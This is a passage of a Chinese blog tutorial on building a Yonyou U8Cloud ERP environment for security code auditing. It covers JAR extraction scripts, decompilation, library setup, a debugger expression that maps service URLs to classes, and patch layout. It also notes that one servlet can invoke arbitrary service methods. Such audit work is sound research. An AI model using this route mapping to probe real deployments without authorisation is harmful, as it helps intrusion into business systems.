如果第一层目录是 &#x27;com&#x27;，检查第二层是否为 &#x27;yonyou&#x27;</span></span><br><span class="line">                <span class="keyword">for</span> file <span class="keyword">in</span> file_names:</span><br><span class="line">                    parts = file.split(<span class="string">&#x27;/&#x27;</span>)</span><br><span class="line">                    <span class="keyword">if</span> <span class="built_in">len</span>(parts) &gt;= <span class="number">2</span> <span class="keyword">and</span> parts[<span class="number">0</span>] == <span class="string">&#x27;com&#x27;</span> <span class="keyword">and</span> parts[<span class="number">1</span>] == <span class="string">&#x27;yonyou&#x27;</span>:</span><br><span class="line">                        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        logging.error(<span class="string">f&quot;无法处理 JAR 文件 <span class="subst">&#123;jar_path&#125;</span>: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">copy_jar_files</span>(<span class="params">source_dir, target_dir</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;递归复制所有 JAR 文件到目标目录，并按 dir1_dir2_xxx.jar 格式重命名&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(target_dir):</span><br><span class="line">        os.makedirs(target_dir)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> root, dirs, files <span class="keyword">in</span> os.walk(source_dir):</span><br><span class="line">        <span class="keyword">for</span> file <span class="keyword">in</span> files:</span><br><span class="line">            <span class="keyword">if</span> file.endswith(<span class="string">&#x27;.jar&#x27;</span>):</span><br><span class="line">                jar_path = os.path.join(root, file)</span><br><span class="line"></span><br><span class="line">                <span class="comment"># 获取文件的相对路径并生成新的文件名</span></span><br><span class="line">                relative_path = os.path.relpath(root, source_dir)</span><br><span class="line">                new_filename = relative_path.replace(os.sep, <span class="string">&#x27;_&#x27;</span>) + <span class="string">&#x27;_&#x27;</span> + file</span><br><span class="line">                target_path = os.path.join(target_dir, new_filename)</span><br><span class="line"></span><br><span class="line">                <span class="comment"># 如果目标目录中没有这个文件，复制它</span></span><br><span class="line">                <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(target_path):</span><br><span class="line">                    shutil.copy(jar_path, target_path)</span><br><span class="line">                    logging.info(<span class="string">f&quot;已复制新的 JAR 文件: <span class="subst">&#123;jar_path&#125;</span> -&gt; <span class="subst">&#123;target_path&#125;</span>&quot;</span>)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    logging.info(<span class="string">f&quot;文件已存在，跳过复制: <span class="subst">&#123;jar_path&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete_invalid_jars</span>(<span class="params">target_dir</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;遍历目标目录的 JAR 文件，删除第一层目录包含 &#x27;nc&#x27; 或 &#x27;u8c&#x27; 文件夹的文件&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> root, dirs, files <span class="keyword">in</span> os.walk(target_dir):</span><br><span class="line">        <span class="keyword">for</span> file <span class="keyword">in</span> files:</span><br><span class="line">            <span class="keyword">if</span> file.endswith(<span class="string">&#x27;.jar&#x27;</span>):</span><br><span class="line">                jar_path = os.path.join(root, file)</span><br><span class="line"></span><br><span class="line">                <span class="comment"># 检查 JAR 文件是否需要删除</span></span><br><span class="line">                <span class="keyword">if</span> check_first_level_for_nc_or_u8c_or_yonyou(jar_path):</span><br><span class="line">                    os.remove(jar_path)</span><br><span class="line">                    logging.info(<span class="string">f&quot;已删除包含 &#x27;nc&#x27; 或 &#x27;u8c&#x27; 文件夹的 JAR 文件: <span class="subst">&#123;jar_path&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment"># 从命令行参数中获取输入</span></span><br><span class="line">    <span class="comment"># if len(sys.argv) != 3:</span></span><br><span class="line">    <span class="comment">#     print(&quot;用法: python script.py &lt;源目录&gt; &lt;目标目录&gt;&quot;)</span></span><br><span class="line">    <span class="comment">#     sys.exit(1)</span></span><br><span class="line">    <span class="comment">#</span></span><br><span class="line">    <span class="comment"># source_directory = sys.argv[1]  # 源目录</span></span><br><span class="line">    <span class="comment"># target_directory = sys.argv[2]  # 目标目录</span></span><br><span class="line"></span><br><span class="line">    source_directory = <span class="string">&quot;./&quot;</span></span><br><span class="line">    target_directory = <span class="string">&quot;D:/U8CJars/otherJars&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 步骤1: 复制所有 JAR 文件到目标目录，并按 dir1_dir2_xxx.jar 格式重命名</span></span><br><span class="line">    copy_jar_files(source_directory, target_directory)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 步骤2: 删除目标目录中包含 &#x27;nc&#x27; 或 &#x27;u8c&#x27; 文件夹的 JAR 文件</span></span><br><span class="line">    delete_invalid_jars(target_directory)</span><br></pre></td></tr></table></figure>



<p>接着，将所有业务jar压缩成一个zip，丢进jd-gui进行反编译。旁边显示jar包说明正常，左上角file，选择save all source即可：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1759665041421.png"  alt="img"></p>
<p>反编译结束后，解压，添加为idea代码源即可。</p>
<h1 id="库文件添加"><a href="#库文件添加" class="headerlink" title="库文件添加"></a>库文件添加</h1><p>更新一下方法，用上面的jar提取方法就行了。</p>
<p>下面的是老方法，不过对于提取xml，upm等文件还是很方便的。</p>
<p>u8cloud里需要添加的库文件很多，包括external，framework，lib，langlib，middleware，modules，nmc等文件夹。而且有些文件夹不是直接添加就好了，你还得一层层打开，然后添加里面的lib目录，很是麻烦。</p>
<p>所以这里我让AI帮我写了脚本，把所有.jar和classes目录都复制到了一个文件夹下，这样直接添加就行了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">setlocal enabledelayedexpansion</span><br><span class="line"></span><br><span class="line">rem Source and destination paths</span><br><span class="line">set &quot;SRC=D:\U8CERP&quot;</span><br><span class="line">set &quot;DEST=D:\U8CERP\alllibs&quot;</span><br><span class="line"></span><br><span class="line">rem Create destination directory if it does not exist</span><br><span class="line">if not exist &quot;%DEST%&quot; (</span><br><span class="line">    mkdir &quot;%DEST%&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem Copy all .jar files</span><br><span class="line">echo Copying all .jar files from %SRC% to %DEST% ...</span><br><span class="line">for /r &quot;%SRC%&quot; %%f in (*.jar) do (</span><br><span class="line">    echo Copying: %%f</span><br><span class="line">    copy &quot;%%f&quot; &quot;%DEST%&quot; &gt;nul</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem Copy all &quot;classes&quot; folders recursively</span><br><span class="line">echo Copying all &quot;classes&quot; folders from %SRC% to %DEST% ...</span><br><span class="line">for /r &quot;%SRC%&quot; %%d in (classes) do (</span><br><span class="line">    if exist &quot;%%d&quot; (</span><br><span class="line">        echo Copying folder: %%d</span><br><span class="line">        xcopy &quot;%%d&quot; &quot;%DEST%\classes&quot; /e /i /y &gt;nul</span><br><span class="line">    )</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">echo All files copied successfully.</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>

<p>也可以直接修改后缀，这样就能复制.xml等文件到一起。</p>
<p>但是这样有一个问题，就是你在idea里调试，想要查看这个jar是属于哪个文件夹时，就需要复制jar包名称，然后通过everything等工具查找，找到对应的位置。（其实可以复制的时候，将jar命名成dir1_dir2_xxx.jar形式）</p>
<p>不过你也可以让AI写另一个脚本，让它把各个文件夹里的jar包写成idea中xml的格式。因为idea的库实际上是以xml的形式存储的：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806796024.png"  alt="img"></p>
<p>不过个人觉得还是第一种更方便。</p>
<p>最后记得在模块-依赖里把刚刚添加的库勾选上，不然全局搜索会搜不到：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806796057.png"  alt="img"></p>
<h1 id="部分路由映射关系"><a href="#部分路由映射关系" class="headerlink" title="部分路由映射关系"></a>部分路由映射关系</h1><p>webapps&#x2F;u8c_web&#x2F;web.xml 里有一部分servlet映射。</p>
<p>&#x2F;u8cloud&#x2F;api&#x2F;*，&#x2F;u8cloud&#x2F;openapi&#x2F;*等都走nc.bs.framework.server.extsys.ExtSystemInvokerServlet：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806807467.png"  alt="img"></p>
<p>openapi的映射关系在”D:\U8CERP\api\config”</p>
<p>u8cloud里的一部分路由，是通过InvokerServlet的方式来动态加载的。这是web.xml里决定的：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806807476.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806807508.png"  alt="img"></p>
<p>而怎么Invoke具体的Servlet，这是由配置文件决定的”D:\U8CERP\modules\uap\META-INF”，这里面所有的.upm记录了映射关系：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806807565.png"  alt="img"></p>
<p>可以用上面的脚本把所有的upm文件复制到一起。</p>
<p>也可以在这里打断点：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806821635.png"  alt="img"></p>
<p>然后访问&#x2F;service&#x2F;esnserver</p>
<p>然后运行表达式：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">ComponentMeta[] componentMetas = publicRepo.getComponentMetas();</span><br><span class="line">HashMap&lt;Object, Object&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line"><span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; publicRepo.getCount(); i++) &#123;</span><br><span class="line">    <span class="keyword">try</span>&#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> componentMetas[i].getName();</span><br><span class="line">        <span class="type">ComponentMeta</span> <span class="variable">meta</span> <span class="operator">=</span> componentMetas[i];</span><br><span class="line">        <span class="type">Instantiator</span> <span class="variable">raw</span> <span class="operator">=</span> ((ComponentMetaImpl) meta).getRawInstantiator();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> raw.getClass().getDeclaredField(<span class="string">&quot;implementation&quot;</span>);</span><br><span class="line">        f.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">o</span> <span class="operator">=</span> (Class) f.get(raw);</span><br><span class="line">        <span class="type">String</span> <span class="variable">clazzName</span> <span class="operator">=</span> o.getName();</span><br><span class="line">        hashMap.put(name, clazzName);</span><br><span class="line">    &#125;<span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">String</span> <span class="variable">filePath</span> <span class="operator">=</span> <span class="string">&quot;D:/U8CERP/map_output.txt&quot;</span>;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="type">BufferedWriter</span> <span class="variable">writer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedWriter</span>(<span class="keyword">new</span> <span class="title class_">FileWriter</span>(filePath));</span><br><span class="line">    <span class="keyword">for</span> (Map.Entry&lt;Object, Object&gt; entry : hashMap.entrySet()) &#123;</span><br><span class="line">        writer.write(<span class="string">&quot;urlName-/service/&quot;</span>+entry.getKey() + <span class="string">&quot;: className-&quot;</span> + entry.getValue());</span><br><span class="line">        writer.newLine(); <span class="comment">// 换行</span></span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这样就能把url和class的映射关系全都打印出来了。</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806821608.png"  alt="img"></p>
<p>部分urlName可能需要写成&#x2F;service&#x2F;<del>uap&#x2F;xxx的形式。取决于component有没有name。像这种没有name的就需要加上</del>uap：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806842706.png"  alt="img"></p>
<p>可以直接到我的仓库下载：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://github.com/1diot9/MyJavaSecStudy/tree/main/CodeAudit/%E7%94%A8%E5%8F%8BU8cloud" >MyJavaSecStudy&#x2F;CodeAudit&#x2F;用友U8cloud at main · 1diot9&#x2F;MyJavaSecStudy<i class="fas fa-external-link-alt"></i></a></p>
<p>&#x2F;ServiceDispatcherServlet，能够调用任意service的任意public方法。service的名字从upm文件里找，是interface标签里的。</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1759665101614.png"  alt="img"></p>
<h1 id="补丁分析"><a href="#补丁分析" class="headerlink" title="补丁分析"></a>补丁分析</h1><p>去官网能搜索到补丁：<a class="link"   target="_blank" rel="noopener" href="https://security.yonyou.com/#/patchList" >https://security.yonyou.com/#/patchList<i class="fas fa-external-link-alt"></i></a></p>
<p>补丁一般是这样的目录结构：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">|   installpatch.xml</span><br><span class="line">|   packmetadata.xml</span><br><span class="line">|   readme.txt</span><br><span class="line">|</span><br><span class="line">\---replacement</span><br><span class="line">    +---external</span><br><span class="line">    |   \---classes</span><br><span class="line">    |       \---nc</span><br><span class="line">    |           \---bs</span><br><span class="line">    |               \---framework</span><br><span class="line">    |                   \---server</span><br><span class="line">    |                       \---token</span><br><span class="line">    |                               TokenUtil$TokenUtilHolder.class</span><br><span class="line">    |                               TokenUtil.class</span><br><span class="line">    |</span><br><span class="line">    +---ierp</span><br><span class="line">    |   \---bin</span><br><span class="line">    |       \---token</span><br><span class="line">    |               trustServiceList.conf</span><br><span class="line">    |</span><br><span class="line">    \---modules</span><br><span class="line">        \---hrpub</span><br><span class="line">            \---META-INF</span><br><span class="line">                \---classes</span><br><span class="line">                    \---nc</span><br><span class="line">                        \---impl</span><br><span class="line">                            \---hr</span><br><span class="line">                                \---tools</span><br><span class="line">                                    \---trans</span><br><span class="line">                                            FileTransImpl.class</span><br></pre></td></tr></table></figure>

<p>位于classes和META-INF中的.class文件优先级更高，这样web应用启动时就会选择最新的类，从而打上补丁。</p>
<p>ierp里都是配置文件，比如白名单之类的。</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.yyu8c.com/#/u8chelp/solution/b5a47b67759a100c2a7140d00266b530" >https://www.yyu8c.com/#/u8chelp/solution/b5a47b67759a100c2a7140d00266b530<i class="fas fa-external-link-alt"></i></a></p>
<p>可以通过这个工具去自动安装所有补丁</p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                用友U8Cloud环境搭建
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2025/08/16/用友U8Cloud环境搭建/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">1diot9</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2025-08-16 19:58</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/08/16/%E7%94%A8%E5%8F%8BU8cloud-esnserver%E6%8E%A5%E5%8F%A3RCE/"
                                   title="用友U8cloud-esnserver接口RCE"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">用友U8cloud-esnserver接口RCE</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/08/10/changeUserInfo%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-ofsLogin%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/"
                                   title="泛微ecology9_changeUserInfo信息泄露+ofsLogin任意用户登录"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">泛微ecology9_changeUserInfo信息泄露+ofsLogin任意用户登录</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-number">2.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">远程调试</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#jar%E6%8F%90%E5%8F%96%E4%B8%8E%E5%8F%8D%E7%BC%96%E8%AF%91"><span class="nav-number">4.</span> <span class="nav-text">jar提取与反编译</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%93%E6%96%87%E4%BB%B6%E6%B7%BB%E5%8A%A0"><span class="nav-number">5.</span> <span class="nav-text">库文件添加</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%83%A8%E5%88%86%E8%B7%AF%E7%94%B1%E6%98%A0%E5%B0%84%E5%85%B3%E7%B3%BB"><span class="nav-number">6.</span> <span class="nav-text">部分路由映射关系</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E4%B8%81%E5%88%86%E6%9E%90"><span class="nav-number">7.</span> <span class="nav-text">补丁分析</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">1diot9</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    
        
        <div class="deploy-info info-item">
            
            本站由 <span class="tooltip" data-tooltip-content="GitHub Pages"><img src="/images/brands/github.png"></span> 提供部署服务
            
        </div>
    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">76.2k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-number">2.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">远程调试</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#jar%E6%8F%90%E5%8F%96%E4%B8%8E%E5%8F%8D%E7%BC%96%E8%AF%91"><span class="nav-number">4.</span> <span class="nav-text">jar提取与反编译</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%93%E6%96%87%E4%BB%B6%E6%B7%BB%E5%8A%A0"><span class="nav-number">5.</span> <span class="nav-text">库文件添加</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%83%A8%E5%88%86%E8%B7%AF%E7%94%B1%E6%98%A0%E5%B0%84%E5%85%B3%E7%B3%BB"><span class="nav-number">6.</span> <span class="nav-text">部分路由映射关系</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E4%B8%81%E5%88%86%E6%9E%90"><span class="nav-number">7.</span> <span class="nav-text">补丁分析</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="pjax">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        
            
<script src="/js/post/copyright-info.js"></script>

        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




</body>
</html>
